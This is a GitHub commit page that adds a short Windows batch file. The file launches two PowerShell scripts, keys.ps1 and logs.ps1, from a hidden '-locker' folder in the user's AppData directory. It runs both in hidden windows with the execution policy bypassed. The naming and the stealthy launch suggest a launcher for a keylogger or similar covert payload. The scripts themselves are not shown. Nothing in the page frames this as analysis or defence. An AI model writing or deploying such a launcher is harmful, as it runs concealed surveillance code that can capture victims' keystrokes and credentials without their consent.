Add files via upload

This commit is contained in:
I-Am-Jakoby 2022-12-23 12:14:01 -06:00 committed by GitHub
parent 3b0035c7e6
commit b2880e8a71
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
3 changed files with 160 additions and 0 deletions

View file

@ -0,0 +1,10 @@
@echo off
powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/keys.ps1"
powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/logs.ps1"